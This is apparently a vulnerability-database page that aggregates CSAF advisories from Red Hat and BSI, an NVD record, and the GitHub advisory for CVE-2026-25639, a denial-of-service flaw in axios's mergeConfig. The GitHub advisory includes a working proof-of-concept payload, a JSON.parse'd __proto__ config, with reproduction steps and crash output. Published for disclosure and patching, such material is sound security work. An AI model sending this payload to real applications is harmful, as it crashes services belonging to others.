"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
}
]
}
WID-SEC-W-2026-0881
Vulnerability from csaf_certbund - Published: 2026-03-25 23:00 - Updated: 2026-03-26 23:00{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Das IBM License Metric Tool dient der Lizenzverwaltung f\u00fcr IBM Produkte.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein Angreifer kann mehrere Schwachstellen in IBM License Metric Tool ausnutzen, um Informationen offenzulegen, einen Cross Site Scripting Angriff durchzuf\u00fchren oder einen Denial of Service zu verursachen.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- Sonstiges\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-0881 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0881.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-0881 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0881"
},
{
"category": "external",
"summary": "IBM Security Bulletin vom 2026-03-25",
"url": "https://www.ibm.com/support/pages/node/7267652"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-6180 vom 2026-03-27",
"url": "https://security-tracker.debian.org/tracker/DSA-6180-1"
}
],
"source_lang": "en-US",
"title": "IBM License Metric Tool: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-03-26T23:00:00.000+00:00",
"generator": {
"date": "2026-03-27T09:01:48.461+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-0881",
"initial_release_date": "2026-03-25T23:00:00.000+00:00",
"revision_history": [
{
"date": "2026-03-25T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-03-26T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Debian aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c9.2.43",
"product": {
"name": "IBM License Metric Tool \u003c9.2.43",
"product_id": "T052193"
}
},
{
"category": "product_version",
"name": "9.2.43",
"product": {
"name": "IBM License Metric Tool 9.2.43",
"product_id": "T052193-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:license_metric_tool:9.2.43"
}
}
}
],
"category": "product_name",
"name": "License Metric Tool"
}
],
"category": "vendor",
"name": "IBM"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-68161",
"product_status": {
"known_affected": [
"2951",
"T052193"
]
},
"release_date": "2026-03-25T23:00:00.000+00:00",
"title": "CVE-2025-68161"
},
{
"cve": "CVE-2026-22860",
"product_status": {
"known_affected": [
"2951",
"T052193"
]
},
"release_date": "2026-03-25T23:00:00.000+00:00",
"title": "CVE-2026-22860"
},
{
"cve": "CVE-2026-25500",
"product_status": {
"known_affected": [
"2951",
"T052193"
]
},
"release_date": "2026-03-25T23:00:00.000+00:00",
"title": "CVE-2026-25500"
},
{
"cve": "CVE-2026-25639",
"product_status": {
"known_affected": [
"2951",
"T052193"
]
},
"release_date": "2026-03-25T23:00:00.000+00:00",
"title": "CVE-2026-25639"
}
]
}
WID-SEC-W-2026-0479
Vulnerability from csaf_certbund - Published: 2026-02-23 23:00 - Updated: 2026-03-30 22:00| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat OpenShift ist eine \"Platform as a Service\" (PaaS) L\u00f6sung zur Bereitstellung von Applikationen in der Cloud.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Red Hat OpenShift Service Mesh ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Sonstiges\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-0479 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-0479.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-0479 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0479"
},
{
"category": "external",
"summary": "Red Hat Security Advisory vom 2026-02-23",
"url": "https://access.redhat.com/errata/RHSA-2026:3105"
},
{
"category": "external",
"summary": "Red Hat Security Advisory vom 2026-02-23",
"url": "https://access.redhat.com/errata/RHSA-2026:3106"
},
{
"category": "external",
"summary": "Red Hat Security Advisory vom 2026-02-23",
"url": "https://access.redhat.com/errata/RHSA-2026:3109"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7263555 vom 2026-03-13",
"url": "https://www.ibm.com/support/pages/node/7263555"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5636 vom 2026-03-24",
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5633 vom 2026-03-24",
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5665 vom 2026-03-24",
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5174 vom 2026-03-24",
"url": "https://access.redhat.com/errata/RHSA-2026:5174"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5807 vom 2026-03-25",
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5142 vom 2026-03-25",
"url": "https://access.redhat.com/errata/RHSA-2026:5142"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:6174 vom 2026-03-30",
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:6170 vom 2026-03-30",
"url": "https://access.redhat.com/errata/RHSA-2026:6170"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:6192 vom 2026-03-30",
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
}
],
"source_lang": "en-US",
"title": "Red Hat OpenShift Service Mesh (Kiali): Schwachstelle erm\u00f6glicht Denial of Service",
"tracking": {
"current_release_date": "2026-03-30T22:00:00.000+00:00",
"generator": {
"date": "2026-03-31T08:19:23.074+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-0479",
"initial_release_date": "2026-02-23T23:00:00.000+00:00",
"revision_history": [
{
"date": "2026-02-23T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-03-15T23:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2026-03-24T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-03-25T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-03-30T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "5"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "IBM App Connect Enterprise",
"product": {
"name": "IBM App Connect Enterprise",
"product_id": "T051349",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:app_connect_enterprise:-"
}
}
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"branches": [
{
"category": "product_version",
"name": "Service Mesh 3.1",
"product": {
"name": "Red Hat OpenShift Service Mesh 3.1",
"product_id": "T051103",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:service_mesh_3.1"
}
}
},
{
"category": "product_version",
"name": "Service Mesh 3.0",
"product": {
"name": "Red Hat OpenShift Service Mesh 3.0",
"product_id": "T051104",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:service_mesh_3.0"
}
}
},
{
"category": "product_version",
"name": "Service Mesh 3.2",
"product": {
"name": "Red Hat OpenShift Service Mesh 3.2",
"product_id": "T051105",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:service_mesh_3.2"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-25639",
"product_status": {
"known_affected": [
"67646",
"T051349",
"T051104",
"T051103",
"T051105"
]
},
"release_date": "2026-02-23T23:00:00.000+00:00",
"title": "CVE-2026-25639"
}
]
}
FKIE_CVE-2026-25639
Vulnerability from fkie_nvd - Published: 2026-02-09 21:15 - Updated: 2026-02-18 18:24| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57 | Patch | |
| security-advisories@github.com | https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e | ||
| security-advisories@github.com | https://github.com/axios/axios/pull/7369 | ||
| security-advisories@github.com | https://github.com/axios/axios/pull/7388 | ||
| security-advisories@github.com | https://github.com/axios/axios/releases/tag/v0.30.3 | ||
| security-advisories@github.com | https://github.com/axios/axios/releases/tag/v1.13.5 | Product, Release Notes | |
| security-advisories@github.com | https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433 | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "A8935935-994A-4A4E-9FBB-E83C9EF0B2E3",
"versionEndExcluding": "1.13.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5."
},
{
"lang": "es",
"value": "Axios es un cliente HTTP basado en promesas para el navegador y Node.js. Antes de la versi\u00f3n 1.13.5, la funci\u00f3n mergeConfig en axios falla con un TypeError al procesar objetos de configuraci\u00f3n que contienen __proto__ como propiedad propia. Un atacante puede desencadenar esto proporcionando un objeto de configuraci\u00f3n malicioso creado a trav\u00e9s de JSON.parse(), causando una denegaci\u00f3n de servicio completa. Esta vulnerabilidad se corrigi\u00f3 en la versi\u00f3n 1.13.5."
}
],
"id": "CVE-2026-25639",
"lastModified": "2026-02-18T18:24:34.120",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-02-09T21:15:49.010",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/axios/axios/pull/7369"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/axios/axios/pull/7388"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/axios/axios/releases/tag/v0.30.3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-754"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-43FC-JF86-J433
Vulnerability from github – Published: 2026-02-09 17:46 – Updated: 2026-02-18 17:16Denial of Service via proto Key in mergeConfig
Summary
The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
Details
The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:
utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
const merge = mergeMap[prop] || mergeDeepProperties;
const configValue = merge(config1[prop], config2[prop], prop);
(utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});
When prop is '__proto__':
JSON.parse('{"__proto__": {...}}')creates an object with__proto__as an own enumerable propertyObject.keys()includes'__proto__'in the iterationmergeMap['__proto__']performs prototype chain lookup, returningObject.prototype(truthy object)- The expression
mergeMap[prop] || mergeDeepPropertiesevaluates toObject.prototype Object.prototype(...)throwsTypeError: merge is not a function
The mergeConfig function is called by:
Axios._request()atlib/core/Axios.js:75Axios.getUri()atlib/core/Axios.js:201- All HTTP method shortcuts (
get,post, etc.) atlib/core/Axios.js:211,224
PoC
import axios from "axios";
const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);
Reproduction steps:
- Clone axios repository or
npm install axios - Create file
poc.mjswith the code above - Run:
node poc.mjs - Observe the TypeError crash
Verified output (axios 1.13.4):
TypeError: merge is not a function
at computeConfigValue (lib/core/mergeConfig.js:100:25)
at Object.forEach (lib/utils.js:280:10)
at mergeConfig (lib/core/mergeConfig.js:98:9)
Control tests performed:
| Test | Config | Result |
|------|--------|--------|
| Normal config | {"timeout": 5000} | SUCCESS |
| Malicious config | JSON.parse('{"__proto__": {"x": 1}}') | CRASH |
| Nested object | {"headers": {"X-Test": "value"}} | SUCCESS |
Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.
Impact
Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.
Affected environments:
- Node.js servers using axios for HTTP requests
- Any backend that passes parsed JSON to axios configuration
This is NOT prototype pollution - the application crashes before any assignment occurs.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.13.4"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.13.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.30.2"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.30.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-25639"
],
"database_specific": {
"cwe_ids": [
"CWE-754"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-09T17:46:14Z",
"nvd_published_at": "2026-02-09T21:15:49Z",
"severity": "HIGH"
},
"details": "# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) \u0026\u0026 merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `\u0027__proto__\u0027`:\n\n1. `JSON.parse(\u0027{\"__proto__\": {...}}\u0027)` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `\u0027__proto__\u0027` in the iteration\n3. `mergeMap[\u0027__proto__\u0027]` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse(\u0027{\"__proto__\": {\"x\": 1}}\u0027);\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse(\u0027{\"__proto__\": {\"x\": 1}}\u0027)` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.",
"id": "GHSA-43fc-jf86-j433",
"modified": "2026-02-18T17:16:28Z",
"published": "2026-02-09T17:46:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/7369"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/pull/7388"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v0.30.3"
},
{
"type": "WEB",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.